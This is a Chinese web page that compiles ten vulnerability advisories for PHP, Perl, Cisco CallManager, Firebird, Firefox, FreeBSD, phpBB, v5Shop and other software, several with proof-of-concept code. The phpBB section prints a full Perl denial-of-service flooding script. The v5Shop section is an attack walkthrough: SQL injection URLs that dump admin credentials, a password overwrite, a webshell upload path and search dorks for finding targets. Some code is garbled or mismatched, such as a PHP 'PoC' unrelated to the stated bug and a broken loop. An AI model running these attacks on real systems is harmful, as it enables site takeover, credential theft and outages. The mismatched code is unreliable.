PHPzendstrtod函数浮点值拒绝服务漏洞及修复

时间:2023-01-14 07:43:26 其他范文 收藏本文 下载本文

PHPzendstrtod函数浮点值拒绝服务漏洞及修复(推荐10篇)由网友“鼻毛打结”投稿提供,以下是小编整理过的PHPzendstrtod函数浮点值拒绝服务漏洞及修复,欢迎阅读分享,希望对您有所帮助。

PHPzendstrtod函数浮点值拒绝服务漏洞及修复

篇1:PHPzendstrtod函数浮点值拒绝服务漏洞及修复

影响版本:

PHP PHP 5.3.2

PHP PHP 5.3.1

PHP PHP 5.3

PHP PHP 5.2.15

PHP PHP 5.2.13

PHP PHP 5.2.12

PHP PHP 5.2.11

PHP PHP 5.2.10

PHP PHP 5.2.9 -2

PHP PHP 5.2.9

PHP PHP 5.2.8

PHP PHP 5.2.7

PHP PHP 5.2.6

PHP PHP 5.2.5

PHP PHP 5.2.4

PHP PHP 5.2.3

PHP PHP 5.2.2

PHP PHP 5.2.1

Ubuntu Ubuntu Linux 7.04 sparc

Ubuntu Ubuntu Linux 7.04 powerpc

Ubuntu Ubuntu Linux 7.04 i386

Ubuntu Ubuntu Linux 7.04 amd64

PHP PHP 5.1.6

Ubuntu Ubuntu Linux 6.10 sparc

Ubuntu Ubuntu Linux 6.10 powerpc

Ubuntu Ubuntu Linux 6.10 i386

Ubuntu Ubuntu Linux 6.10 amd64

PHP PHP 5.1.5

PHP PHP 5.1.4

PHP PHP 5.1.3 -RC1

PHP PHP 5.1.3

PHP PHP 5.1.2

Ubuntu Ubuntu Linux 6.06 LTS sparc

Ubuntu Ubuntu Linux 6.06 LTS powerpc

Ubuntu Ubuntu Linux 6.06 LTS i386

Ubuntu Ubuntu Linux 6.06 LTS amd64

PHP PHP 5.1.1

PHP PHP 5.1

PHP PHP 5.0.5

PHP PHP 5.0.4

PHP PHP 5.0.3

Trustix Secure Linux 2.2

PHP PHP 5.0.2

PHP PHP 5.0.1

PHP PHP 5.0 candidate 3

PHP PHP 5.0 candidate 2

PHP PHP 5.0 candidate 1

PHP PHP 5.0 .0

PHP PHP 5.3.3

PHP PHP 5.2.14

PHP PHP 5.2

Debian Linux 4.0 sparc

Debian Linux 4.0 s/390

Debian Linux 4.0 powerpc

Debian Linux 4.0 mipsel

Debian Linux 4.0 mips

Debian Linux 4.0 m68k

Debian Linux 4.0 ia-64

Debian Linux 4.0 ia-32

Debian Linux 4.0 hppa

Debian Linux 4.0 arm

Debian Linux 4.0 amd64

Debian Linux 4.0 alpha

Debian Linux 4.0

漏洞描述:

PHP是容易远程拒绝服务漏洞,

PHPzendstrtod函数浮点值拒绝服务漏洞及修复

成功的攻击将导致PHP编写的应用程序挂起,创建一个拒绝服务条件。

PHP 5.3.3是脆弱的,其他版本也可能受到影响。

<*参考

sebug.net/

*>

测试方法:

以下证明,可用的概念代码:

$b = “bbbbbbbbbbb”;

str_repeat(“THIS IS A SECRET MESSAGE, ISN'T IT?”, 1);

$var3 = mb_strcut($b, 0, 1000);

echo $var3;

?>

解决方案:

目前我们没有任何厂商提供的修补程序,请关注官方获取

篇2:Perl Perlregnumberedbufffetch 函数远程拒绝服务漏洞

影响版本:

Larry Wall Perl 5.x

漏洞描述:

Perl 是一种自由且功能强大的编程语言,它被用作 Web 编程、数据库处理、XML 处理以及系统管理等等 ― 它能够完成所有这些工作,同时仍然是处理小的日常工作的完美工具。

Perl “Perl_reg_numbered_buff_fetch()”函数在实现上存在远程拒绝服务漏洞,远程攻击者可利用此漏洞造成使用受影响perl代码的应用程序终止运行,拒绝服务合法用户,

<*参考

*>

测试方法:

#!/usr/bin/perl

my @x = (“A=B”,“AAAA=/”);

utf8::upgrade $_ for @x;

$x[1] =~ s{/s*$}{};

for (@x) {

m{^([^=]+?)s*=.+$};

}

厂商补丁:

Larry Wall

----------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

www.perl.org/

篇3:微软发布“拒绝服务漏洞”修复补丁漏洞预警

在修补了59个IE漏洞之后,微软终于为其安全软件堵上了一个安全漏洞,据悉,该漏洞可在使用“恶意软件防护引擎”(Malware Protection Engine)进行扫描时触发。然后,攻击者可利用其发动拒绝服务(DoS)攻击,除非文件被删除并重启。

微软将该补丁设定成了“重要”级别。

尽管攻击者要实现一次成功的攻击,需要来自用户的一些交互(如下载一个附件并打开),可鉴于大多数用户的技能水平和安全意识,未打补丁的系统仍将面临极大的风险。

受该漏洞影响的软件包括Microsoft Forefront Client Security、Microsoft Forefront Endpoint Protection 、Microsoft Forefront Security for SharePoint Service Pack 3、Microsoft System Center Endpoint Protection、Microsoft Malicious Software Removal Tool,以及Windows Intune Endpoint Protection、Microsoft Security Essentials和Windows Defender(最后一个可是随着最新的微软OS一起预装的,影响面也是最广的),

虽然微软会通过“自动更新”来升级上述软件的定义库和引擎,但用户最好还是看下自己的“恶意软件防护引擎”的版本是否已经升级到了1.1.10701.0及以上。

篇4:Cisco CallManager拒绝服务漏洞

成功利用这些漏洞会导致拒绝服务攻击,造成高CPU使用率、中断服务或重启服务器,然后可能导致电话无法响应、从CCM注销电话或CCM重启,

详细描述:

Cisco CallManager(CCM)是Cisco IP电话解决方案的基于软件的呼叫处理组件。 P

一些CCM版本没有主动管理TCP连接和Windows消息,导致一些公开的发布端口受拒绝服务攻击影响:

1 CCM没有足够主动的超时到端口的TCP连接,导致足够多的开放连接会耗尽内存和CPU资源。在特定的情况下,CCM会无限期的保持TCP连接开放,直到重启CCM服务或重启服务器。

2 多个到、或7727端口的连接会充满Windows消息队列,导致CCM无法处理Windows Service Manager,在30秒超时后重启CCM,

成功利用这些漏洞会导致拒绝服务攻击,造成高CPU使用率、中断服务或重启服务器,然后可能导致电话无法响应、从CCM注销电话或CCM重启。

受影响系统:

Cisco Call Manager = 3.2

Cisco Call Manager 4.1

Cisco Call Manager 4.0

Cisco Call Manager 3.3

补丁下载:

Cisco

-----

Cisco已经为此发布了一个安全公告(cisco-sa-0118-ccmdos)以及相应补丁:

cisco-sa-20060118-ccmdos:Cisco Call Manager Denial of Service

链接:www.cisco.com/warp/public/707/cisco-sa-20060118-ccmdos.shtml

篇5:请求远程拒绝服务漏洞

/* CSS Document */

Firebird是一款提供多个ANSI SQL-92功能的关系型数据库,可运行在Linux、Windows和各种Unix平台下,

在Firebird的src/remote/server.cpp文件中,process_packet2函数负责处理从客户端发送过来的报文。这个函数有一个switch语句考虑协议中所定义的所有可能的opcode。

/-----------

src/remote/server.cpp:

...

3404   P_OP p = receive->p_operation;

3405   switch (op)

3406   {

3407   case op_connect:

...

3426   case op_compile:

...

3430   case op_attach:

...

- -----------/

在op_connect_request报文的情况下,执行流进入switch语句的以下case:

/-----------

src/remote/server.cpp:

...

3584   case op_connect_request:

3585       aux_request(port, &receive->p_req, sendL);

3586       break;

- -----------/

在调用aux_request()函数并执行break语句后,执行流到达:

/-----------

src/remote/server.cpp:

...

3652   if (port && port->port_state == state_broken) {

3653       if (!port->port_parent) {

3654           gds__log(“SERVER/process_packet: broken port, server exiting”);

3655           port->disconnect(sendL, receive);

3656           ThreadData::restoreSpecific();

3657           return false;

3658       }

3659       port->disconnect(sendL, receive);

3660       port = NULL;

3661   }

- -----------/

通过在接收到op_connect_request报文时调试fbserver.exe二进制程序可以看出满足了第一个if语句的条件,但没有满足第二个if的条件,因此执行流到达port->disconnect()调用:

/-----------

005ACE2C |> 837E 0C 03          CMP DWORD PTR DS:[ESI+C],3

;port->port_state == state_broken ?

005ACE30 |. 75 1B               JNZ SHORT fbserver.005ACE4D

005ACE32 |. 837E 1C 00          CMP DWORD PTR DS:[ESI+1C],0

;port->port_parent == 0?

005ACE36 |. 75 0A               JNZ SHORT fbserver.005ACE42

;this conditional jump is taken

005ACE38 |. 68 D4D65F00         PUSH fbserver.005FD6D4

; ASCII “SERVER/process_packet: broken port, server exiting”

005ACE3D |.^ E9 44FDFFFF         JMP fbserver.005ACB86

005ACE42 |> 53                  PUSH EBX

; /Arg2

005ACE43 |. 57                  PUSH EDI

; |Arg1

005ACE44 |. 8BCE                MOV ECX,ESI

; |

005ACE46 |. E8 65D7FFFF         CALL

; /port->disconnect(sendL, receive)

- -----------/

根据src/remote/remote.h中的定义,port的类型为struct rem_port,

这种结构类型在src/remote/server.cpp中实现了disconnect()函数:

/-----------

src/remote/server.cpp:

1464   void rem_port::disconnect(PACKET* sendL, PACKET* receiveL)

- -----------/

在这个函数中执行以下代码以释放发送和接收的报文并关闭相关的套接字:

/-----------

src/remote/server.cpp:

[1] [2] 下一页

篇6:or=or 漏洞修复方法

hacknote.com

解决方法:搜索login.asp下的

把类似

username=request.Form(“name”)

pass=request.Form(“pass”)

修改为

username=Replace(request.Form(“name”), “'”, “''”)

pass=Replace(request.Form(“pass”), “'”, “''”)

语法是屏蔽'和''这个来达到效果.

==============================

有的程序根据具体情况不一样

篇7:Mozilla Firefox jsInitRandom函数不充分随机数漏洞及修复

影响版本:

Mozilla Firefox 4.0 Beta1

Mozilla Firefox 3.6.x

Mozilla Firefox 3.5.x漏洞描述:

CVE(CAN) ID: CVE--3399,CVE-2010-3400

Firefox是一款非常流行的开源WEB浏览器,

Firefox的JavaScript实现中的js_InitRandom函数使用了当前时间或环境相关的指针作为随机数生成器的种子,攻击者可以通过暴力猜测攻击相对容易的猜测到种子值,从而执行劫持会话等各种攻击,

<*参考

Johnathan Nightingale (johnath@johnath.com)

bugzilla.mozilla.org/show_bug.cgi?id=475585

*>

厂商补丁:

Mozilla

-------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

bugzilla.mozilla.org/attachment.cgi?id=400900&action=diff

篇8:FreeBSD setusercontext函数绕过安全限制漏洞及修复

影响版本:

FreeBSD 8.0

FreeBSD 7.2漏洞描述:

BUGTRAQ ID: 42533

FreeBSD就是一种运行在Intel平台上、可以自由使用的开放源码Unix类系统,

在以其他用户的权限运行时lib/libutil/login_class.c文件中的setusercontext函数应用了特定的用户设置,这允许本地用户通过创建特制的~/.login_conf文件并通过OpenSSH登录更改某些受限制的资源。<*参考

Andrey Zonov (andrey.zonov@gmail.com)

secunia.com/advisories/40923/

www.freebsd.org/cgi/query-pr.cgi?pr=141840

*>

测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

1. 在/etc/login.conf中添加新的登录类

test:

:cputime=1h:

:tc=default:

2. Make db

# cap_mkdb /etc/login.conf

3. 更改账号的登录类

# pw usermod $login -L test

4. 通过$login以SSH连接到这个主机并执行limits -a

$ limits -a

Resource limits (current):

cputime 3600 secs

filesize infinity kB

datasize 524288 kB

stacksize 65536 kB

coredumpsize infinity kB

memoryuse infinity kB

memorylocked infinity kB

maxprocesses 3603

openfiles 7207

sbsize infinity bytes

vmemoryuse infinity kB

pseudo-terminals infinity

swapuse infinity kB

5. 创建~/.login_conf

me:

:cputime=2h:

6. 再次连接到这个主机并执行limits -a

$ limits -a

Resource limits (current):

cputime 7200 secs

filesize infinity kB

datasize 524288 kB

stacksize 65536 kB

coredumpsize infinity kB

memoryuse infinity kB

memorylocked infinity kB

maxprocesses 3603

openfiles 7207

sbsize infinity bytes

vmemoryuse infinity kB

pseudo-terminals infinity

swapuse infinity kB

厂商补丁:

FreeBSD

-------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

www.freebsd.org/cgi/query-pr.cgi?pr=141840

篇9:phpBB远程拒绝服务漏洞漏洞预警

phpBB远程拒绝服务漏洞

漏洞版本:

phpBB phpBB 3.0.8

phpBB phpBB 3.0.7

phpBB phpBB 3.0.6

phpBB phpBB 3.0.5

phpBB phpBB 3.0.4

phpBB phpBB 3.0.3

phpBB phpBB 3.0.2

phpBB phpBB 3.0.1

phpBB phpBB 3.0

phpBB phpBB 2.0.21

phpBB phpBB 2.0.19

phpBB phpBB 2.0.17

phpBB phpBB 2.0.16

phpBB phpBB 2.0.15

phpBB phpBB 2.0.14

phpBB phpBB 2.0.13

phpBB phpBB 2.0.12

phpBB phpBB 2.0.11

phpBB phpBB 2.0.10

phpBB phpBB 2.0.9

phpBB phpBB 2.0.7

phpBB phpBB 2.0.6

phpBB phpBB 2.0.5

phpBB phpBB 2.0.4

phpBB phpBB 2.0.3

phpBB phpBB 2.0.2

phpBB phpBB 2.0.1

phpBB phpBB 1.4.4

phpBB phpBB 1.4.2

phpBB phpBB 1.4.1

phpBB phpBB 1.2.1

phpBB phpBB 2.0.22

phpBB phpBB 2.0.20

phpBB phpBB 2.0.18

漏洞描述:

Bugtraq ID:65481

phpBB是phpBB组开发的一套开源的使用PHP语言开发的Web论坛软件,该软件具有支持多国语言、支持多种数据库和自定义版面设计等特点。

phpBB中存在远程拒绝服务漏洞。攻击者可利用该漏洞造成受影响应用程序崩溃,拒绝服务合法用户。

<* 参考

www.securityfocus.com/bid/65481

sebug.net/appdir/phpBB

*>

测试方法:

@Sebug.net dis

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

###########################

# Phpbb Forum Denial of Service Vulnerability

###########################

#!/usr/bin/perl

# Iranian Exploit DataBase

# Phpbb Forum Denial of Service Vulnerability

# Version: All Version

# Vendor site : www.phpbb.com

# Code Written By Amir – iedb.team@gmail.com – o0_iedb_0o@yahoo.com

# Site : Www.IeDb.Ir – Www.IrIsT.Ir

# Fb Page :

www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538

# Greats : TaK.FaNaR – ErfanMs – Medrik – F@riD – Bl4ck M4n – 0x0ptim0us

- 0Day – Dj.TiniVini – E2MA3N

# l4tr0d3ctism – H-SK33PY – Noter – r3d_s0urc3 – Dr_Evil And All

Members In IeDb.Ir/acc

#####################################

use Socket;

if (@ARGV < 2) { &usage }

$rand=rand(10);

$host = $ARGV[0];

$dir = $ARGV[1];

$host =~ s/(http:\/\/)//eg;

for ($i=0; $i<10; $i–)

{

$data =

“securitytoken=guest&do=process&query=%DB%8C%D8%B3%D8%A8%D9%84%D8%B3%DB%8C%D9%84%D8%B3%DB%8C%D8%A8%D9%84%0%0%0%0%0%0%0%0%0%0&submit.x=0&submit.y=0″;

$len = length $data;

$foo = “POST “.$dir.”search.php?do=process HTTP/1.1\r\n”.

“Accept: * /*\r\n”.

“Accept-Language: en-gb\r\n”.

“Content-Type: application/x-www-form-urlencoded\r\n”.

“Accept-Encoding: gzip, deflate\r\n”.

“User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n”.

“Host: $host\r\n”.

“Content-Length: $len\r\n”.

“Connection: Keep-Alive\r\n”.

“Cache-Control: no-cache\r\n\r\n”.

“$data”;

my $port = “80″;

my $proto = getprotobyname(‘tcp’);

socket(SOCKET, PF_INET, SOCK_STREAM, $proto);

connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;

send(SOCKET,”$foo”, 0);

syswrite STDOUT, “+” ;

}

print “\n\n”;

system(‘ping $host’);

sub usage {

print “\n”;

print “################################################# \n”;

print “## Phpbb Forum Denial of Service Vulnerability\n”;

print “## Discoverd By Amir – iedb.team@gmail.com – Id : o0_iedb_0o \n”;

print “## Www.IeDb.Ir – Www.IrIsT.Ir \n”;

print “################################################# \n”;

print “## [host] [path] \n”;

print “## host.com /forum/\n”;

print “################################################# \n”;

print “\n”;

exit();

};

#####################################

# Archive Exploit = www.iedb.ir/exploits-868.html

#####################################

###########################

# Iranian Exploit DataBase = IeDb.Ir [-11-17]

###########################

安全建议:

目前厂商暂无提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

www.phpbb.com/

篇10:v5Shop注入漏洞及修复

/commond.aspx?id=1869

没办法union,只能让它暴错了

暴管理员用户名:/commond.aspx?id=1869 and 1=(select top 1 [name] from web_admin)--

暴管理员密 码:/commond.aspx?id=1869 and 1=(select top 1 [pass] from web_admin)--

过滤了单引号.只能把字符串转化成16进制的了

更新管理员密码:update web_admin set

pass=0x31004200460041004500370042004500410043004600350036003200330041003200430042

004400450037004400450041003600340042003700430037004300

weblogin/System_Config_Operate.aspx

后台上传水印.可以直接上传大马.

拿webshell

切记.千万不要传ASPX的马......不然不会成功的.

你可以先传ASP的马..再传ASPX马.

马的路径为:uploadFile/Picture/木马.asp

关键字:services.aspxid=

inurl:scoreindex.aspx

默认后台地址:weblogin/Login.aspx

/weblogin/index.aspx

复制这段代码 域名+代码

cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --

更新管理员密码:update web_admin setpass=0x310042004600410045003700420045004100430046003500360032003300410032004300420044

00450037004400450041003600340042003700430037004300

weblogin/System_Config_Operate.aspx

后台上传水印.可以直接上传大马.

后台拿webshell

切记.不要传ASPX的马......不然不会成功的.

你可以先传ASP的马..再传ASPX马.

马的路径为:uploadFile/Picture/木马.asp

文章作者:黑面小窝

修复:对照过滤

MySQL文件系统先睹为快数据库

Linux Kiss Server lks.c文件多个格式串处理漏洞

学员必须了解的C语言技术

计算机三级网络技术近年笔试试题及答案

C语言嵌套注释

C语言中表达式和表达式语句的区别

恒生电子笔试 C/C++开发笔试题

Linux配置MySQL数据库详解linux操作系统

微软面试笔试试题大家谈

F2摩托艇比赛

PHPzendstrtod函数浮点值拒绝服务漏洞及修复
《PHPzendstrtod函数浮点值拒绝服务漏洞及修复.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【PHPzendstrtod函数浮点值拒绝服务漏洞及修复(推荐10篇)】相关文章:

计算机网络综合实验报告参考2022-05-26

abiword的中文显示问题!_Unix系统2022-11-07

财务招聘笔试题2022-06-30

Lua数据类型介绍2022-08-18

计算机二级c语言试题及答案2022-11-07

大众机械招聘笔试题2022-06-25

微软研究院面试题目2022-10-20

c语言学习方法2022-05-06

c语言函数知识点总结2023-04-03

书的新一代2022-08-16

点击下载本文文档